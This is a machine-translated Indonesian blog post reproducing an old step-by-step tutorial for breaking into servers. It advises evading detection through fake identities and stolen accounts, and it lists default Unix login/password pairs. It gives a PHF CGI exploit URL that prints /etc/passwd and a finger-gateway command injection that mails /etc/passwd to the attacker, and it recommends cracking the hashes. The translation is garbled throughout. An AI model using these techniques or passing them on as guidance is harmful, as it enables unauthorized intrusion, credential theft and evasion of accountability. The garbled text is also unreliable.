Sabtu, 20 Agustus 2011

Hacking in telnet FTP

Versi terjemahan dari hacking in telnet ftp.rtf


 

[Aku Ingin Mulai Mulai]

[Aku Ingin Pergi Langsung ke Hacking]

PENDAHULUAN:


Sebuah sedikit latar belakang diperlukan sebelum kita masuk ke teknik hacking.



Ketika kita berbicara tentang 'Hacking', kita berbicara tentang mendapatkan beberapa akses pada server kita tidak seharusnya.

Server diatur sehingga banyak orang dapat menggunakan mereka.
Orang-orang ini masing-masing memiliki yang berbeda 'account' pada server - seperti direktori yang berbeda yang dimiliki hanya untuk mereka.
Jika Fred memiliki account dengan ISP froggy.com.au (Internet Service Provider), ia akan diberikan:

(1) nama login, yang seperti nama direktori Anda, dan

(2) sandi, yang memungkinkan Anda mendapatkan akses ke direktori tersebut.

Ini nama login dan password biasanya akan memberikan Anda akses ke semua layanan Fred - surat-suratnya, layanan berita dan halaman web.
Ada juga 'root' account, yang telah login itu sendiri dan password.
Ini memberikan super-user akses ke seluruh server.
Kami akan fokus pada 'mendapatkan root', dalam file ini membantu.


 

[Ok, saya ingin pindah ke 'anatomi hack']

[Aku tahu semua ini, izinkan saya bergerak lurus untuk hacking]

[

Saya tidak memiliki petunjuk apa yang Anda tentang, biarkan saya membaca beberapa backgroundon ini "internet" disebut Anda tetap mengacu pada <http://www.cyberarmy.com/tute/htext1.shtml>]

ANATOMI DARI 'Hack':

Ada dua cara utama untuk masuk ke sistem.
Pikirkan server sebagai Vault Bank Swiss.
Ada dua cara utama untuk mendapatkan masuk Anda dapat mencoba untuk masuk dengan menemukan kombinasi lemari besi.
Ini seperti menemukan password.
Ini bagaimana Anda dimaksudkan untuk masuk Cara kedua adalah dengan menggunakan dinamit.
Anda melupakan semua tentang cara 'tepat' untuk masuk ini seperti menggunakan 'eksploitasi', atau kelemahan dalam sistem operasi server untuk mendapatkan akses.


 

[Ok, Mari kita Go.
Tell Me Tentang Tidak Mendapatkan Tertangkap]

[Stuff, aku tahu bagaimana untuk tidak tertangkap, ke teknik!]

'Jangan terjebak':


Hacking adalah ilegal, dan sangat mudah untuk melacak Anda jika froggy.com.au menyadari Anda hacked mereka.

Kemanapun Anda pergi,

nomor IP Anda (identifikasi unik komputer Anda) yang tersisa dan sering login.

Solusi:


1.

Bila Anda membuat account Anda dengan ISP, memberikan nama palsu dan alamat.


 

[Nah, aku tidak bisa diganggu, hal lain apa yang dapat saya lakukan?]

[Ok, saya menggunakan trik ini.
Apa lagi yang bisa saya lakukan?]

[Stuff, aku tahu bagaimana untuk tidak tertangkap, ke teknik!]

'Jangan terjebak':

2.
Hack menggunakan akun filched (pencurian password, dll).
Sebuah tool bernama
<http://www.cyberarmy.com/files/dripper.zip> Dripper
bisa mencuri password untuk Anda dari kafe internet publik dan perpustakaan.


 

[Nah, katakan saja padaku sesuatu yang mudah saya bisa lakukan sekarang]

[Ok, dilakukan.
Ada lagi yang harus saya lakukan?]

'Jangan terjebak':

3.
Port koneksi Anda melalui sesuatu yang lain.

Cara mudah untuk melakukan ini adalah untuk mengubah pengaturan proxy Anda.
Dengan menggunakan pengaturan proxy dimaksudkan untuk ISP yang berbeda, dapat terlihat seperti Anda surfing dari manapun yang ISP.
Daftar proxy dapat Anda gunakan
di sini <http://www.cyberarmy.com/lists/proxy>.

Anda juga harus melakukan pengumpulan info penting melalui Applet Jamming IP pada
<http://www.cyberarmy.com> Cyberarmy.Com
untuk menyembunyikan IP anda.

Jika Anda ingin anonimitas super, Anda harus surfing di account Anda mengatur dengan nama palsu, dengan pengaturan proxy Anda berubah, dan juga surfing melalui applet IP Jamming!
Perlu diketahui bahwa beberapa ISP bisa menggunakan Caller ID untuk menguji jumlah seseorang log on.
Dial kode yang relevan untuk menonaktifkan Caller ID sebelum memanggil ISP Anda.


 


 

[Saya tidak mengerti tentang hal pengaturan proxy, biarkan aku membaca lebih <http://www.cyberarmy.com/tute/htext3.shtml>]

[Ok, saya kabel untuk hiper siluman ...
Sekarang, saya ingin HACK!]

INFO GATHERING:


Untuk memulai, Anda mungkin akan perlu mengumpulkan informasi tentang www.froggy.com.au menggunakan alat internet.


 

[Ok, bagaimana?]

[Berikan saya beberapa bacaan yang harus dilakukan tentang pengumpulan informasi <http://www.cyberarmy.com/tute/htext2.shtml>]

[Tidak, aku sudah punya semua info, katakan saja padaku apa yang harus dilakukan]

DIRT Menggali TAHAP:

Kami sekarang mengambil langkah pertama hack apapun ...
Info Mengumpulkan.

Anda harus diatur untuk mode siluman.
Dapatkan notepad, dan membuka jendela browser baru (melalui IP jammer).
Bawa halaman www.froggy.com.au 'web di jendela jammer IP.
Anda dapat memuat applet Jamming IP pada
<http://www.cyberarmy.com> Cyberarmy.Com.


 

[Ok, Apa Sekarang?]

KASUS BERSAMA:

1.
Pertama, memeriksa situs.
Mencatat alamat email, menyalin HTML halaman penting.


 

[Selesai ...
Apa Else?]

THE TRIK LAMA memantul MAIL:

2.
Kirim mail yang akan memantul ke situs.
Jika situs www.froggy.com.au, mengirim email ke blahblahblah@froggy.com.au.
Ini akan memantul kembali kepada Anda dan memberi Anda informasi dalam header.

Salin informasi dari header ke bawah.

(Untuk menjaga anonimitas, mungkin ide yang baik untuk mengirim dan menerima email dari penyedia web gratis berbasis, seperti hotmail.com Menggunakan fitur siluman penuh saat mengirim surat terpental.. Ini akan melindungi Anda ketika mereka memeriksa melalui log setelah mereka hack.)


 

[Selesai ...
Apa Else?]

Traceroute:

3.
Masih menggunakan fitur siluman, Traceroute froggy.com.au.
Ini pencarian Traceroute adalah tersedia dari Home Page Hacker, di bagian Net Tools.

Ini akan memberitahu Anda penyedia hulu dari server korban.


 

[Ok, apa selanjutnya?]


 

WHOIS:

3.
Masih menggunakan fitur siluman, Whois situs.
Ini pencarian Whois tersedia dari Home Page Hacker, di bagian Net Tools.

Hal ini akan memberikan informasi tentang pemilik dan server yang menjalankan situs.
Menuliskannya.


 

[Ok, apa selanjutnya?]


 

BERIKAN 'EM jari:

4.
Finger situs.
Gunakan layanan ini jari pada Cyberarmy.Com untuk memeriksa situs.
Cobalah meraba hanya dengan "finger@froggy.com.au" pertama.
Hal ini terkadang memberitahu Anda nama semua account.
Jika ini tidak berhasil, cobalah meraba alamat email apapun yang Anda temukan di situs, dan melalui Whois.
Hal ini terkadang akan memberikan informasi yang berguna.


 

[Ok, apa selanjutnya?]


 

THE SCAN PORT MEMATIKAN:

5.
Sekarang, kita akan mendapatkan kasar di situs.
Pelabuhan Pindai situs.

Cek port scanning untuk semua port terbuka untuk IP.
Hal ini sangat berguna, bagaimanapun, praktis jeritan ke webmaster dari situs korban bahwa mereka berada di tengah-tengah hacked.
Ini pada dasarnya tidak ada alasan yang sah untuk scan port situs kecuali Anda hendak hack.

Tidak ada cara yang sangat baik untuk menyembunyikan port scan, tapi ada semi-tersembunyi beberapa port scanner.
Sebagian besar hanya untuk sistem Linux / Unix.
Namun, Generator Eksploitasi untuk Windows adalah salah satu yang mengklaim menjadi tersembunyi.
Namun, jika Anda mencoba untuk memasukkan situs yang sangat aman, mungkin lupa tentang port scanning untuk saat ini, kecuali jika Anda menjalankan Linux.

Padahal, scan port akan memberitahu Anda semua layanan situs sedang berjalan.
Jika port 21 terbuka, itu berarti mereka memiliki sebuah server FTP.
Jika port 23 terbuka, itu berarti mereka harus telnet.


 

[Ok, Apa selanjutnya?]


 

Telnet:

5.
Tujuan dari telnet ke situs pada dasarnya adalah untuk mencoba dan mencari tahu jenis server.
Sementara browser Anda dalam mode siluman, gunakan applet Telnet Anonymous di
<http://www.cyberarmy.com> Cyberarmy.Com
untuk membuka jendela Telnet.

Telnet ke situs ke Port 23.
Biasanya, jika alamat adalah "www.froggy.com.au", coba telnet ke "froggy.com.au".
Jika ini tidak berhasil, coba telnet ke telnet.froggy.com.au atau mencoba telnet ke salah satu situs terdaftar sebagai server nama dalam pencarian sebelumnya Whois Anda.
Setelah Anda sudah mendapat akses, mencatat setiap informasi yang memberi Anda, seperti jenis server.


 

[Ini bekerja - saya mendapat jenis server]

[Tidak ada yang bekerja ...]


 

Telnet:

Sekarang ubah telnet ke port 21.
Ini harus mengirim Anda langsung ke port ftp server.
Jika berhasil, coba ketikkan syst untuk mencari tahu apa jenis server itu.


 

[Ini bekerja - saya mendapat jenis server]

[Tidak ada yang bekerja ...]


 

Telnet:

Sekarang, jika Anda beruntung, coba telnet ke port 80, port HTTP.
Catatan jika ini memberi Anda informasi.


 

[Ini bekerja - saya mendapat jenis server]

[Tidak ada yang bekerja ...]


 

MENJALANKAN PROGRAM Lame:

Anda perlu * * untuk mengetahui jenis server untuk memiliki harapan hacking hal.
Bagaimana Anda berharap untuk menjalankan eksploitasi terhadap jika Anda cant bahkan mengetahui apa yang Anda sedang berhadapan dengan di sini?

Sebuah resor terakhir adalah untuk menjalankan program yang disebut Whats Menjalankan?
Ini tidak bekerja sangat baik, tapi kadang-kadang akan memberitahu Anda jenis server.
Ini juga akan mungkin akan dicatat oleh server korban.

Jika itu tidak bekerja, melakukan apa saja untuk menemukan jenis server.
Bahkan menulis mereka e-mail yang meminta apa sistem operasi yang mereka sedang berjalan.


 

[Ok, saya punya Info yang ...
Sekarang saya ingin akses!]


 

HACKING PASSWORD YANG MELALUI:

Kita sekarang akan mencoba untuk pergi melalui pintu depan server.
Seperti analogi, kami mencoba untuk menemukan kombinasi aman.


 

[Ok, saya ingin root!]

[Nah, aku sudah tahu server ini akan memerlukan eksploitasi]


 

MUDAH HAL PERTAMA:


Anda akan menendang sendiri jika ya menghabiskan berminggu-minggu mencoba hack maju dengan eksploitasi, IP spoofing dan sosial


rekayasa, hanya untuk menemukan bahwa kita bisa masuk dengan menggunakan:



$ Login: root


$ Password: root



Jadi, mari kita coba ini pertama dan mendapatkannya keluar dari jalan.

Unix datang mengatur dengan beberapa password default, dan

kadang-kadang ini tidak berubah.

Jadi, kita telnet ke froggy.com.au.


Jangan gunakan program telnet biasa.

Kecuali Anda menggunakan account filched atau anonim, ia akan menampilkan

alamat IP Anda untuk froggy.com.au.

Dengan proxy Anda berubah, dan mengatur segalanya untuk siluman, beralih kembali ke jendela Telnet Anonim.


Kemudian cobalah akun-akun berikut dan password:



REKENING: PASSWORD


(Login) root: (password) root


sys: sys / sistem / bin


bin: sys / bin


mountfsys: mountfsys


adm: adm


uucp: uucp


nuucp: anon


anon: anon


user: pengguna


permainan: permainan


menginstal: menginstal


demo: demo


umountfsys: umountfsys


sync: sinkronisasi


admin: admin


tamu: tamu


daemon: daemon



Akar account, mountfsys, umountfsys, menginstal, dan kadang-kadang sync adalah akar tingkat account, yang berarti mereka memiliki kekuatan sysop, atau total daya.

Login login lain hanya "pengguna tingkat" yang berarti mereka hanya memiliki kekuatan

atas apa file / proses yang mereka miliki.


 

[NUP ...
Apakah tidak berpikir itu akan berhasil]

[Menakjubkan ...
Itu Sebenarnya Bekerja Trik Lame!]


 

MENGGUNAKAN NAMA LOGIN:

Masih sederhana hal pertama.
Sekitar 1 dari 20 orang cukup bodoh untuk memiliki nama login dan password yang sama.
Dengan daftar semua alamat email atau informasi jari Anda menggali dari situs, cobalah ini.

Misalnya, jika situs web membuat referensi untuk fred@froggy.com.au, coba log in (melalui telnet atau FTP

program untuk server mereka) sebagai:



$ Masuk: Fred


$ Password: Fred



Lakukan ini dengan semua nama yang telah ditemukan - Anda mungkin beruntung.



Apakah pekerjaan ini?


 

[Nah, mereka telah beberapa keamanan baddass, tidak bekerja]

[Oh, Gee Waduh ...
Aku punya akses ke salah satu rekening!]


 

MENDAPATKAN FILE PASSWORD:


Anda mungkin tidak beruntung sampai sekarang.

Sebenarnya, teknik hacking yang paling hanya memiliki peluang tipis keberhasilan.
Anda hanya mencoba ratusan kemungkinan tipis sampai Anda mendapatkannya.

Dengan asumsi Anda mencoba untuk login di sistem Unix, Anda mungkin telah bertanya-tanya bagaimana Unix memeriksa untuk melihat apakah password yang Anda berikan adalah benar atau tidak.
Ada sebuah file yang bernama 'passwd' pada setiap sistem Unix yang memiliki semua password untuk setiap pengguna.
Jadi, jika kita tidak bisa menebak password, sekarang kita akan mencoba untuk merobek file ini dan dekripsi.


 

[Buatlah begitu, Nomor 1]


 

CINA KUNO FTP METODE:

Browser anda harus di set untuk menggunakan proxy palsu.
Kami akan tetap menggunakan browser ini untuk FTP, karena tidak dapat dengan mudah ditelusuri, sedangkan sesuatu seperti CuteFTP dapat ditelusuri kepada Anda karena tidak dapat menggunakan proxy.
Jika dalam port scan, Anda menemukan sebuah port opne 21, sebuah indikasi yang cukup baik bahwa mereka menjalankan server FTP.

Menggunakan browser siluman Anda, cobalah untuk FTP untuk froggy.com.au.
Contoh: ftp://froggy.com.au


Jika itu tidak bekerja, cobalah untuk FTP untuk ftp.froggy.com.au.

Contoh: ftp://ftp.froggy.com.au


Jika itu tidak bekerja, cobalah untuk FTP untuk Server Nama Domain terdaftar ketika Anda melakukan pencarian WHOIS Anda.

Contoh: ftp://ns1.froggy.com.au


 

[Ok, aku In]

[Nah, hal yang bodoh tidak akan membiarkan saya dalam]


 

CINA KUNO FTP METODE:

Sekarang Anda terhubung ke server FTP froggy.com.au 's, klik pada direktori etc \ mereka.

Anda harus melihat file bernama 'passwd' dan mungkin file yang disebut 'kelompok'.
Download 'passwd' file, dan

melihatnya.

Jika terlihat seperti ini ketika Anda membukanya, Anda sedang beruntung:


root: 2fkbNba29uWys: 0:01: Operator: /: / bin / csh


admin: rYsKMjnvRppro: 100:11: Administrator WWW: / home / Umum / WWW: / bin / csh


kangguru: 3A62i9qr: 1012:10: Hisaharu


[Dll]



Sebagai contoh, kita tahu login adalah "kanguru" dan password terenkripsi mereka adalah "3A62i9qr".

Catatan - ini bukan password mereka, tetapi sebuah bentuk terenkripsi dari password mereka.


Atau, apakah terlihat lebih seperti ini:



root: *: 00:01: Operator: /: / bin / csh


admin: *: 100:11: WWW administrator: / home / Umum / WWW: / bin / csh


kangguru: *: 1012:10: Hisaharu TANAKA: / home / user / kangguru: / usr / local / bin / tcsh



Apakah kedua, bagian sandi, terenkripsi digantikan oleh * 's atau s x?

Ini buruk - itu disebut berbayang

password dan tidak dapat didekripsi.

Ini adalah bagaimana file yang terbanyak passwd sekarang hari.
Namun, jika Anda punya

passwd file yang memiliki beberapa non-shadowed entri, Anda dapat menempatkan tangan Anda untuk mendekripsi itu.


 

[Nah, itu semua berbayang]

[Nah, tidak bisa menemukan file passwd di tempat pertama]

[Ya!
Saya pikir saya punya beberapa non-shadowed password]


 

Decrypting FILES PASSWORD:


Ada beberapa program sekitar yang ditulis ke file mendekripsi Unix passwd.

Yang paling terkenal disebut "Cracker Jack '.
Banyak 'hacking' teks sangat merekomendasikan file ini - tetapi kebanyakan mereka berbicara sampah.
Sistem yang tua dan yang paling hanya akan crash ketika mereka mencoba untuk menjalankannya, karena menggunakan alokasi memori aneh.

Cracker Unix terbaik di sekitar saat ini disebut 'John the Ripper 1,5'.
Ini tersedia.
Itu hanya ditulis pada tahun lalu atau lebih, dan jauh lebih cepat daripada Cracker Jack pernah ada.
John the Ripper juga dirancang dengan Pentiums dalam pikiran, dan techique kekerasan yang digunakan adalah jenius.
Tapi Anda harus pergi ke DOS untuk menggunakannya.

Anda juga akan memerlukan 'wordfile' besar, dengan setiap kata Inggris.
Lebih besar lebih baik.
Program Crack menguji setiap kata dalam wordfile terhadap file passwd.
Jika wordfile cukup besar, Anda memiliki kesempatan baik untuk mendapatkan password.


 

[Ya!
I Got Me Beberapa Sandi didekripsi!]

[Nah, Enkripsi itu terlalu Baik]

[Berikan saya beberapa bacaan tentang semua cracker password yang berbeda, di mana untuk menemukan mereka, dll <http://www.cyberarmy.com/tute/htext4.shtml>]


 

Gaya lama PHF TEKNIK:

Meskipun kebanyakan server sekarang telah menghancurkan sebuah program yang disebut PHF, mari kita pastikan ...
Hal ini bekerja, itu memungkinkan Anda mendapatkan file passwd jarak jauh, bahkan jika itu ada di dalam tersembunyi dan akses root direktori saja.

Dalam Anonymi Overlord, ketik:

http://www.froggy.com.au / cgi-bin/phf? Qalias = x% 0a/bin/cat% 20/etc/passwd.

Jika PHF aktif (sering tidak), string ini akan mencetak etc / passwd file selat ke browser web Anda semua yang perlu Anda lakukan adalah menyimpannya sebagai file dan lagi menjalankan program retak menentangnya.

Sekarang, jika Anda melihat Tersenyum kata-kata '!
Anda berada di Candid Camera! ", Itu berarti bahwa server dilindungi terhadap hack ini, dan telah login IP anda.
Tapi jangan khawatir.
Selama Anda menggunakan anonymi, Anda aman.


 

[Nah, mereka tetap yang Soal Bug PHF]

[Ya!
I Got Me Beberapa Sandi Encrypted!]


 

FINGER BOX HACKING:

Server jari teman hacker.
Mari kita mengetahui apakah www.froggy.com.au memiliki server jari.

Dalam Anonymi, dengan asumsi bahwa nama server dimulai dengan www, ketik www.froggy.com.au / cgi-bin/finger

Jika gateway jari operasional sebuah kotak akan muncul bagi Anda untuk memasukkan nama yang Anda ingin jari.
Jika operasional Anda memiliki kesempatan untuk menerima etc / passwd file.

Oke, 1 / mendapatkan daftar alamat e-mail Anda ditemukan situs (mari kita berpura-pura salah satunya adalah "kangaroo@froggy.com.au", dan bahwa alamat email Anda adalah "your@email.org")

2 / Kembali ke kotak jari, dan jenis ini di (mengubah ini untuk alamat email yang sebenarnya):

kangaroo@froggy.com.au; / bin / mail your@email.org <etc / passwd

Ini mengambil file passwd melalui kangaroo@froggy.com.au dan email ke alamat email Anda.
Jika ini bekerja Anda sekarang memiliki etc / passwd file di kotak surat Anda ....
Anda sekarang dapat menjalankan program retak melawan dan bersenang-senang sedikit pada kotak mereka.


 

[Nah, itu tidak bekerja]

[Ya!
I Got Me Beberapa Sandi Encrypted!]


 

INSTALASI LINUX

Semua di atas benar-benar telah memberi Anda ide-ide dasar.
Untuk melakukan firther sesuatu, dan impliment setiap eksploitasi nyata, Anda harus menempatkan sistem operasi Linux pada komputer Anda.
Berikut adalah beberapa petunjuk tentang cara untuk cepat dan mudah menginstal Linux di komputer Anda.
Anda hanya dapat men-download file di bawah ini gratis, dan menginstalnya di direktori pada MS-DOS / sistem Windows!
Itu benar, Anda bahkan tidak perlu partisi ulang Hard Drive!

Oke ...
Aku akan membuat ini sebagai dasar dan bebas mungkin.
Aku akan menganggap Anda sedang menjalankan Windows 95 atau 98 dan belum pernah melihat Linux sebelumnya.
Anda memiliki Hard Drive dengan setidaknya gratis 100MB.
Anda punya floppy drive, dll Anda tahu bagaimana untuk unzip file.
Dan Anda tidak ingin menghabiskan uang.
Untungnya, Linux adalah gratis dan mudah untuk diatur.

1 /
Download this <ftp://sunsite.anu.edu.au/pub/linux/distributions/slackware/zipslack/zipslack.zip> file
(Australia).
Ini besar, seperti 34MB.
Tapi itu semua yang Anda butuhkan.
Jika situs ada kelebihan beban, mendapatkannya
di sini <ftp://ftp.cdrom.com/pub/linux/slackware/zipslack/zipslack.zip>.

2 / Apa yang Anda miliki adalah versi Slackware Linux, yang disebut ZipSlack.
Ini versi sangat sederhana dari Slackware Linux untuk mengatur.
Saya tidak menggunakan Slackware, dan ada beberapa versi yang lebih baik sekitar sekarang - seperti RedHat 5.2.
Tapi, itu adalah versi stabil yang baik - dan, seperti saya katakan, sangat sederhana untuk men-download dan setup.
Baik untuk test drive Linux.

3 / Ok, buat direktori yang disebut 'Linux' pada Hard Drive.
Itu benar, dengan distro ini, Anda bahkan tidak perlu merubah partisi drive Anda.
Hal ini dapat di Hard Drive yang sama Anda memiliki Windows pada!
(Saya bilang ini akan mudah).
Pastikan direktori utama pada hard drive anda, seperti c: \ linux - tidak dalam subdirektori mana saja.

4 / Sekarang, hanya unzip semua isi zipslack.zip ke direktori yang tepat, seperti c: \ linux \ etc, c: \ linux \ usr, dll

5 / Sekarang, Heres bagian tersulit.
Anda harus mengedit file \ linux \ linux.bat.
Buka di dalam editor.

6 / Anda harus mengedit file LINUX.BAT, dan pastikan root = / dev / XXXX poin ke Hard Drive.
Jika Anda telah menempatkan pada hard drive utama Anda, Anda dapat membuat baris:

\ Linux \ loadlin \ linux \ vmlinuz root = / dev/hda1 (hda1 berarti IDE1 Guru HDD)

Saya memiliki Linux pada saya drive D: (yang IDE2 Guru HDD), dan bagi saya garis akan:

\ Linux \ loadlin \ linux \ vmlinuz root = / dev/hdc1

7 / Jika Anda tidak yakin, file Linux.bat memiliki daftar panjang contoh.
Hanya menebak.
Jika Anda mendapatkan salah, Anda masih akan dapat menggunakan scrollback (tombol shift kanan dan PageUp) ketika menghentikan kernel untuk kembali dan melihat partisi Anda, mencatat nama-nama Linux memberi mereka.
Dengan informasi ini, Anda harus dapat mengedit LINUX.BAT dengan benar.

8 / Yah, saya melewatkan terburu-buru.
Anda sekarang (sudah) siap untuk boot sistem Linux Anda.
Siapa bilang sulit?

9 / Ok, Anda harus pergi 'Shut Down' dan 'Restart di MS-DOS Mode'.
Kemudian hanya pergi ke \ Linux direktori ('cd linux') dan menjalankan Linux.bat

10 / Sistem Linux akan beban itu sendiri melalui MS-DOS (meski anda tidak perlu memuat alih DOS - kemudian Anda bisa membuat boot-disk sehingga hanya beban linux).

11 / Anda akan melihat banyak hal seluruh pembebanan.
Kemudian Anda akan melihat login: prompt.

12 / Anda memiliki sistem operasi sama seperti semua server jaring besar telah!

13 / Oke, cukup ketik 'root', dan Anda memiliki akses root pada sistem.
Anda akan ingin memberikan diri Anda password, ketik 'passwd'.
Pilih sesuatu yang Anda akan ingat.
Tanpa itu, Anda tidak bisa login

14 / Sekarang Anda akan memiliki layar hitam dengan # melihat Anda.
Jangan biarkan yang khawatir Anda - yang hanya seperti layar MS-DOS.
Sebuah beberapa perintah untuk sekarang: 'ls' (seperti 'dir' pada MS-DOS), 'cd' (direktori berubah, seperti dos), 'pico' (editor, gunakan seperti 'text.txt pico'), dan ' mc '(ini adalah menu program bagus yang datang dengan ZipSlack).

15 / Sekarang, ketik 'pengaturan'.

16 / Setup mouse Anda, pengaturan jaringan, hal layar.
Sangat mudah.
Sama seperti - 'Anda menggunakan mouse 2 tombol atau 3'?
Mudah.

17 / Sekarang, jika Anda ingin akses internet, melalui ini - ketik 'pppsetup'.
Ini memulai ppp (point to point protokol) setup.
Anda perlu tahu semua pengaturan internet Anda, seperti Gateway, nomor Nameserver, dll Jika Anda tidak tahu ini, kembali ke jendela dan melihat apa nilai yang Anda digunakan dari Control Panel: bagian Internet.

18 / Oke.
Reboot.
Mouse anda harus bekerja, dengan sedikit keberuntungan.
Mudah-mudahan, modem Anda akan dapat dial.
Padahal, sering tidak.
Jika Anda memiliki modem eksternal standar pada com 2, mungkin oke.
Jika tidak, kadang-kadang rasa sakit untuk mengkonfigurasi modem Anda untuk Linux.

19 / Jika Anda mengalami masalah modem, mc ketik 'untuk menjalankan Midnight Commander.
Buka 'dll' direktori, kemudian 'rc.d', kemudian 'serials.rc'.
Komentar pada bagian konfigurasi otomatis dengan tanda '#'.
Dan pergi ke bagian konfigurasi manual.
Uncomment / dev/cua0 (Com 1:) dan / dev/cua1 (Com 2:) - atau / dev/cua2 atau cua3 (Com 3: atau 4:) untuk pengguna modem internal.
Sekarang, dari jendela, pergi ke Aksesoris: System Tools: Sistem Informasi (Win 98) untuk mendapatkan IRQ dan Pengaturan Port untuk modem Anda.
Jika Anda berada di Win95, saya pikir Anda harus menjalankan sesuatu yang disebut msd.com di direktori windows \.
Masukan pengaturan ini masuk Kemudian, mengedit S.rc dan di bagian bawah, uncomment tempat di mana ia mengatakan untuk memanggil file serials.rc.

20 / Jika Anda memiliki CD-Rom Anda juga dapat mengedit S.rc sehingga memeriksa CD Rom saat bootup.

21 / Semua hal berjalan dengan baik, Anda seharusnya sudah memiliki sebuah sistem Unix jenis berfungsi penuh pada komputer Anda.
Anda dapat men-download semua terbaru kecilmu X-Ganyang program (dalam format tgz.).
Untuk setup Perangkat Lunak - mengatakan scanner Linux siluman port, menyimpan file tgz dalam direktori dan menjalankan "pkgtool"..
Lalu pergi 'instal file'.
Nyata mudah.
Jika sebuah program C, ketik 'gcc program.c' untuk kompilasi.

22 / Nah, Anda kehilangan jenis antarmuka Windows.
Anda tidak perlu satu.
Tetapi jika Anda ingin surfing menggunakan Linux, dll Lebih baik untuk memiliki antarmuka grafis - meskipun Anda dapat menjalankan browser yang disebut 'lynx' hanya melalui antarmuka Linux vanili.

23 / Anda bisa mendapatkan beberapa hal, seperti X-Windows dari ftp.cdrom.com/pub/linux/slackware/slakware/x1 /

24 / Hanya mendapatkan semua file yang terlihat penting (sekitar 8 dari mereka), dan menjalankan pkgtool untuk menginstal mereka semua.
Anda mungkin akan menemukan bahwa mensetting X-Win untuk pertama kalinya adalah rasa sakit besar.
Itu untuk saya setidaknya - Anda perlu tahu, misalnya, refresh horisontal dan vertikal tingkat monitor anda.
Kemudian, mendapatkan sesuatu seperti Netscape Linux, atau Arena sebagai browser.
Ini dijalankan melalui X-Windows.

25 / Anda akan memiliki segalanya tweaker menyenangkan karena Anda seperti itu.
Ada puluhan jendela antarmuka untuk memilih dari.
Beberapa terlihat hampir identik dengan Win95.

26 / mana dari sini?
Anda sekarang dapat melakukan hampir apa saja - pada dasarnya anda memiliki semua daya bersih ISP anda, kecuali untuk semua saluran telepon.
Anda dapat membiarkan orang menggunakan Anda sebagai dial up ISP, Anda dapat host halaman web dan mengatur situs FTP untuk menjalankan dari komputer Anda.
Anda dapat mengatur alamat email, nameserver ...
apa-apa.

27 / Karena Linux adalah software yang sama seperti kebanyakan ISP dijalankan, banyak hacker menggunakan Linux.
Anda akan dapat mengeluarkan perintah ke server lain.
Anda dapat meminta server lain tentang diri mereka sendiri.
Sebagai contoh, ketik 'showmount-e victim.com'.
Anda juga dapat menjalankan hal-hal seperti 'ping', dan 'traceroute' langsung dari baris perintah Anda.
Anda dapat mengirim email dari program sendmail Anda sendiri sehingga bisa dilacak.

Beberapa insentif terakhir, jika Anda dibesarkan di dunia Windows dan takut prompt perintah, cukup ketik 'mc'.
Distro ZipSlack datang dengan ini 'Midnight Commander' - yang saya gunakan banyak.
Dan memainkan beberapa permainan pada hal-hal.
Ada beberapa favorit lama terinstal secara default - seperti 'perjalanan', dan 'petualangan', dll Jika Anda berada di komputer 20 tahun yang lalu, Anda akan tahu apa yang saya maksud.
Direktori game di usr / game.

Jika Anda memiliki masalah lagi, ada banyak orang di IRC # Linux saluran di Undernet yang sangat membantu.
Jika Linux Anda sudah diatur ke internet, Anda dapat menjalankan program-X Linux Pelacur IRC untuk sampai ke sana.
ZipSlack juga memiliki pinus (untuk email), timah (untuk newsgroup), dan lynx (untuk surfing).

Fakta adalah, ketika Anda punya semua bekerja selama beberapa minggu (dan mungkin mencintai itu), Anda tidak akan ragu ingin mencoba beberapa distro Linux lebih maju.
Meskipun ada banyak perasaan pribadi mengenai berbagai distribusi, saya sarankan Linux RedHat 5.2.
Anda akan menemukan sangat mudah untuk menginstal.

Jika Anda membeli bahagia melalui Amazon.Com,
di sini adalah <http://www.amazon.com/exec/obidos/ASIN/0789717468/thenewbiesarea>
kesepakatan Linux terbaik saya sudah bisa menemukan di mana saja.
Ini berkaitan dengan 3 distribusi Linux utama: Red Hat, Slackware, dan Debian - dengan 3 CD.
Hal ini juga berisi panduan instalasi yang sangat baik.
Semua untuk sekitar setengah harga dari single 'resmi' RedHat CD.
Jika Anda seperti ini hal Linux, saya sarankan Anda mendapatkannya -. Atau setidaknya pastikan Anda mendapatkan buku yang ditulis baru-baru ini [kesalahan saat memproses direktif ini]


 

[Nah, itu tidak bekerja]

[Ya!
I Got Me Beberapa Sandi Encrypted!]


 

LANCAR LIMIT:

Anda telah mencapai batas saat ini tutorial ....
Saya akan menambahkan langkah lebih lanjut ketika saya mendapatkan waktu dan jika orang seperti ini pelajaran.
Juga, jika orang ingin menulis bagian untuk ini, hanya surat bagian untuk saya, ke alamat e-mail yang terdaftar di Cyberarmy.Com.

Sampai ini akan lebih besar, saya dapat menyarankan beberapa buku yang mengajarkan hacking.
Saya telah menemukan bahwa banyak buku adalah sampah dan hanya mengajarkan cara untuk mengubah warna layar, tetapi ada beberapa yang setiap hacker harus di perpustakaan mereka.

THE HACKER'S PERPUSTAKAAN UTAMA:

PENTING BUKU:

1
MAKSIMUM KEAMANAN <http://www.amazon.com/exec/obidos/ASIN/1575212684/thenewbiesarea>:.
Tentu saja, Maximum Security harus di nomor satu.
Saya kira ini mungkin akan menjadi buku utama di perpustakaan setiap hacker.
Berjalan melalui tumpukan teknik seperti sebuah buku teks dengan lebih dari 900 halaman.

. 2
THE <http://www.amazon.com/exec/obidos/ASIN/0929408217/thenewbiesarea> Happy HACKER:
penting untuk pemula.
Meskipun buku ini banyak dikantongi oleh orang yang membenci Carolyn, saya pikir kebanyakan orang setuju itu akan menjadi buku pertama yang sempurna newbie harus membaca.
Menjelaskan hal-hal yang cukup baik, kesalahan ejaan, tapi mungkin suatu primer pemula penting.
Engkau, seperti yang saya katakan, jika Anda tahu barang-barang Anda dengan aman Anda bisa melupakan yang satu ini.

SOFTWARE PENTING:

1
LINUX <http://www.amazon.com/exec/obidos/ASIN/0789717468/thenewbiesarea>:.
Anda akan perlu untuk mengubah ke Linux untuk melakukan hacking serius.
Tapi untungnya, itu cukup sederhana dan Anda hanya dapat mengatur Linux dalam partisi yang terpisah pada Hard Drive dan menetapkan untuk opsi dual boot: biasanya jendela, dan ketika Anda hacking, Linux.
Anda jumlah 'Power Bersih' meningkat 500%.
Jika Anda ingin membeli Linux, pastikan Anda mendapatkan versi terbaru tidak satu usang.
Ada juga beberapa yang berbeda 'rasa' dari Linux, Anda mungkin akan ingin memulai dengan RedHat, kemudian mungkin pindah ke Slackware setelah satu tahun atau lebih.
